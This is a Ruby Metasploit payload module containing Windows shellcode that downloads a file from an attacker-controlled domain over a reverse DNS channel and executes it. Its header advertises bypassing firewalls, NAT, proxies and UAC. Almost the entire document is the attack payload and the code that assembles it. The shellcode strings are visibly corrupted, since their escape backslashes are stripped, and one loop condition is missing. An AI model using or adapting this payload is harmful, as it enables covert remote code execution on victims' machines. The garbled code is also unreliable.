##
#
Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
#       [DSecRG]
#     a.sintsov [sobachka] dsecrg.com
#     dookie [sobachka] inbox.ru
#
# P.S. Works with  Vista/7/2008
#       do not work in XP/2003 because thre are no IPv6 by default.
#       can work in XP/2003 if IPv6 installed
#       (it is not need to be enabled, just installed)

require 'msf/core'

module Metasploit3

include Msf::Payload::Windows
include Msf::Payload::Single

def initialize(info = {})
super(update_info(info,
'Name'          => 'DNS_DOWNLOAD_EXEC',
'Version'       => '0.01',
'Description'   => 'Download and Exec (via DNS)',
'Author'        => [ 'Alexey Sintsov' ],
'License'       => MSF_LICENSE,
'Platform'      => 'win',
'Arch'          => ARCH_X86,
'Payload'       =>
{
'Offsets' =>{ },

'Begin' => "xebx02xebx7Axe8xf9xffxffxffx47x65x74x50x72x6Fx63x41x64x64x72x65x73x73xFFx47x65x74x54x65x6dx70x50x61x74x68x41xFFxFFxFFxFFxFFxFFxFFxFFx57x69x6Ex45x78x65x63xFFx45x78x69x74x54x68x72x65x61x64xffx4Cx6Fx61x64x4Cx69x62x72x61x72x79x41xFFx77x73x32x5fx33x32xFFx57x53x41x53x74x61x72x74x75x70xFFx67x65x74x61x64x64x72x69x6ex66x6fxFFx6dx73x76x63x72x74xFFx66x6fx70x65x6exFFx66x77x72x69x74x65xFFxEBx13x66x63x6cx6fx73x65xFF",

'Payload1' =>            "xFFx5ex33xc9xb1xe4x8bxd1x2bxe2x8bxfcxf3xa4x33xc0x8bxfcx8Ax04x39x3AxCAx74x0Dx3CxFFx74x03x41xEBxF2x88x2Cx39x41xEBxECxebx78x31xC9x64x8Bx71x30x8Bx76x0Cx8Bx76x1Cx8Bx5ex08x8Bx7Ex20x33xedx83xc5x18x8Bx36x66x39x0Cx2Fx75xedx8Bx73x3Cx8Bx74x1Ex78x03xF3x8Bx7Ex20x03xFBx8Bx4Ex14x33xEDx56x57x51x8Bx3Fx03xFBx8BxF2x6Ax0Ex59xF3xA6x74x08x59x5Fx83xC7x04x45xE2xE9x59x5Fx5Ex8BxCDx8Bx46x24x03xC3xD1xE1x03xC1x33xC9x66x8Bx08x8Bx46x1Cx03xC3xC1xE1x02x03xC8x8Bx01x03xC3x8BxFAx8BxF7x83xC6x0Ex8BxD0x6Ax04x59xC3x8bxd4xe8x81xffxffxffx50x33xc0xb0x0fx03xf8x57x53xffxd2x50x33xc0xb0x14x03xf8x57x53xffx54x24x0cx50x33xc0xb0x08x03xf8x57x53xffx54x24x10x50x33xc0xb0x0bx03xf8x57x53xffx54x24x14x50x8bxc7x83xc0x0dx50xffx54x24x04x8bxd8x33xc0xb0x14x03xf8x57x53xffx54x24x18x50x33xc0xb0x0bx03xf8x57x53xffx54x24x1Cx50x83xc7x0cx57xffx54x24x0cx8bxd8x83xc7x07x57x53xffx54x24x20x50x83xc7x06x57x53xffx54x24x24x50x50x8bxf4x83xc7x09x57x53xffx54x24x2cx50x33xc0xb4x03x2bxe0x8bxccx51x50xffx56x20x03xe0x59x59x8bxc8xb8",

'Payload2' =>    "xbax01x01x01x01x2bxc2x50xb8x79x78x6fx2ex50x2bxe1x8bxccx33xc0xb0x77xb4x62x50x54x51xffx56x08x33xd2xb6x03xb2x0cx03xe2x50x33xc0xb4x05x2bxe0x54x33xc0xb0x02xb4x02x50xffx56x10x32xc9x50x80xf9x80x74x04xfexc1xebxf6x83xc4x10xb0x06x50xb0x01x50xb0x17x50x83xecx04x8BxECx83xC7x07x83xECx20x33xC0x8Ax0Cx38x88x0Cx04x40x84xC9x75xF5x33xc0xb9x61x61x61x61x8bxd9x51x8bxd4x83xc2x7fx52x33xd2x55x52x8bxd4x83xc2x0cx52xffx56x0cx59x51x85xc0x75xe7x33xDBxB3xeex2BxE3x50x8bxc5x8bx40x5bx8bx48x18x8bx50x1cx83xC1x08x33xC0x33xFFx66x8Bx01x66x3dxffxffx74x7fx8bxf8xc1xefx08x32xe4x5bx03xfbx57x66x8Bx59x02x66x89x5cx04x04x8Bx79x04x89x7Cx04x06x8Bx79x08x89x7Cx04x0Ax8Bx79x0Cx89x7Cx04x0Ex8bxc2x85xc0x75xbbx58xffx76xf8x50xb0x01x50x8bxc4x83xc0x0cx50xffx56x04x33xc0xb0xeex03xe0x58x58x58x58x58x2Dx61x61x61x61xC0xE4x04x02xC4x3CxFFx75x13x8AxE0x40xc1xe8x10x3cx1ax75x04xfexc4x32xc0xc1xe0x10xebx08x40x8axe0xC0xECx04x24x0Fx05x61x61x61x61x50xe9x46xffxffxffx8bx46xf8x50xffx56xfcx66xb8x22x05x03xe0"+"x68x2fx63x20x22x68x63x6dx64x20x8bxccx41x8ax01x84xc0x75xf9xc6x01x22x88x41x01"+"x33xc0x8bxccx50x51xffx56x1cx50xffx56x18"

}
))

# We use rtlExitThread(0)
deregister_options('EXITFUNC')

# Register the domain and cmd options
register_options(
[
OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
], self.class)
end

#
# Constructs the payload
#
def generate_stage
domain  = datastore['DOMAIN'] || ''
extens  = datastore['FILE'] || 'vbs'

# "x66x79x66x01"
extLen=extens.length

while extens.length<4
extens=extens+"x01"
end

i=0
while i
extens[i,1]=(extens[i].ord+1).chr
i=i+1
end

while domain.length<10
domain=domain+"xFF"
end

domain="x2e"+domain

payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']

return payload
end

end

source: here